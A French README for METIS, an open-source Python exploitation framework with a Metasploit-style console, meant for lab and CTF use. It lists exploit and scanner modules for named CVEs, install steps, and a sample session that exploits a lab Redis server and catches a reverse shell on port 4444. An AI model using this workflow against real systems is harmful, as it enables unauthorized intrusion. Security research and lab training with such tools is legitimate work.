Framework d'exploitation Python modulaire avec une console de style Metasploit, des modules Exploit et Auxiliary à enregistrement automatique, des vérifications à trois états et plusieurs transports de session pour les cibles de laboratoire et de CTF.
███╗ ███╗███████╗████████╗██╗███████╗
████╗ ████║██╔════╝╚══██╔══╝██║██╔════╝
██╔████╔██║█████╗ ██║ ██║███████╗
██║╚██╔╝██║██╔══╝ ██║ ██║╚════██║
██║ ╚═╝ ██║███████╗ ██║ ██║███████║
╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═╝╚══════╝
Un framework d'exploitation Python conçu pour l'apprentissage. Architecture modulaire, console thématisée, multiples transports de session, et une bibliothèque croissante de modules CVE.
METIS est un framework de recherche en sécurité piloté par la communauté. L'objectif est de construire une collection croissante de modules contribués par des chercheurs en sécurité, des développeurs et la communauté au sens large.
Vous avez un scanner utile, un module auxiliaire, un module d'exploitation, ou d'autres outils de recherche en sécurité que vous souhaitez partager ? Ajoutez-le à METIS et ouvrez une Pull Request.
Toutes les contributions sont les bienvenues, à condition qu'elles respectent la structure des modules du projet, les normes de codage et les directives d'utilisation autorisée.
Que vous ajoutiez un nouveau module CVE, amélioriez un module existant, corrigiez un bug, ou développiez de nouvelles fonctionnalités du framework, vos contributions peuvent aider à améliorer METIS pour tout le monde.
Voir Écrire des modules ci-dessous pour plus d'informations sur la création de votre propre module.
METIS est un framework C2/exploitation modulaire écrit en Python. Il exécute une console interactive de style Metasploit où vous sélectionnez des modules, définissez des options, lancez des vérifications, et obtenez des sessions contre des cibles de laboratoire.
Il est conçu pour :
Il n'est pas conçu pour :
.py dans modules/ et il s'enregistre automatiquementExploit (génère des sessions) et Auxiliary (scanners, énumérateurs)check() à trois états — chaque module peut vérifier avant d'attaquer (VULNERABLE / SAFE / UNKNOWN)file: avec barres de progression en directKEY=VALUE| Module | Description |
|---|---|
auxiliary/scanner/tcp_connect | Scanner de ports TCP multi-threadé |
auxiliary/scanner/hikvision_cve_2017_7921 | Contournement d'authentification + énumération d'utilisateurs de caméra IP Hikvision |
auxiliary/scanner/mikrotik_winbox_creds_cve_2018_14847 | Fuite d'identifiants MikroTik WinBox |
auxiliary/scanner/redis_cve_2022_0543 | Détecteur d'évasion de sandbox Lua Redis |
| Module | Type de session |
|---|---|
exploit/unix/ftp/vsftpd_234_backdoor | Socket en écoute |
exploit/multi/http/ghost_cms_handlebars_rce | Socket inverse |
exploit/multi/http/langflow_rce_cve_2026_9198 | Socket inverse |
exploit/multi/http/budibase_plugin_upload_rce_cve_2026_31816 | Socket inverse |
exploit/multi/http/activemq_jolokia_rce_cve_2026_34197 | Socket inverse |
exploit/multi/http/tomcat_put_rce_cve_2017_12615 | Socket inverse |
exploit/multi/http/joomla_jce_rce_cve_2026_48907 | Webshell HTTP |
exploit/linux/http/freepbx_sqli_rce_cve_2025_57819 | Reverse différé (cron) |
exploit/linux/redis/redis_cve_2022_0543_rce | Socket inverse |
exploit/linux/ssh/libssh_auth_bypass_cve_2018_10933 | Canal Paramiko |
exploit/linux/telnet/inetutils_telnetd_bypass_cve_2026_24061 | Socket telnet brut |
Nécessite Python 3.10+ et git.
git clone https://github.com/K3ysTr0K3R/METIS.git
cd METIS
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt
requirements.txt :
pwntools>=4.11.0
requests>=2.31.0
paramiko>=3.0.0
redis>=5.0.0
cryptography>=42.0.0
rich>=13.7.0
prompt_toolkit>=3.0.43
Lancer :
python3 metis.py
metis > show modules
# Module Date Rank Chk Description
-- ------------------------------------------------------------ ---------- --------- --- -----------
1 auxiliary/scanner/hikvision_cve_2017_7921 2017-09-23 normal Yes Hikvision IP Camera Authentication Bypass (CVE-2017-7921)
2 auxiliary/scanner/mikrotik_winbox_creds_cve_2018_14847 2018-08-01 great Yes MikroTik WinBox Credential Leak (CVE-2018-14847)
...
15 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent Yes vsftpd 2.3.4 Backdoor Command Execution
metis > search redis
# Module Date Rank Chk Description
-- ------ ---- ---- --- -----------
1 auxiliary/scanner/redis_cve_2022_0543 2022-02-18 excellent Yes Redis CVE-2022-0543 Scanner
2 exploit/linux/redis/redis_cve_2022_0543_rce 2022-02-18 excellent Yes Redis CVE-2022-0543 Lua Sandbox Escape RCE
metis > use 2
[*] using exploit/linux/redis/redis_cve_2022_0543_rce
metis exploit(linux/redis/redis_cve_2022_0543_rce) > set RHOST 192.168.56.101
[+] RHOST => 192.168.56.101
metis exploit(linux/redis/redis_cve_2022_0543_rce) > set LHOST 192.168.56.1
[+] LHOST => 192.168.56.1
metis exploit(linux/redis/redis_cve_2022_0543_rce) > check
[*] check: probing 192.168.56.101:6379
[VULNERABLE] check: 192.168.56.101 vulnerable to CVE-2022-0543
[*] check -> vulnerable
metis exploit(linux/redis/redis_cve_2022_0543_rce) > exploit
[*] running check() before exploit (AUTOCHECK=true)
[VULNERABLE] check: 192.168.56.101 vulnerable to CVE-2022-0543
[+] target appears vulnerable — proceeding
[*] listening on 192.168.56.1:4444 for reverse shell
[+] shell from 192.168.56.101:51234
[+] new session: <Session a3f2b1c4 192.168.56.101:51234>
metis exploit(linux/redis/redis_cve_2022_0543_rce) > sessions
a3f2b1c4 192.168.56.101:51234 (alive)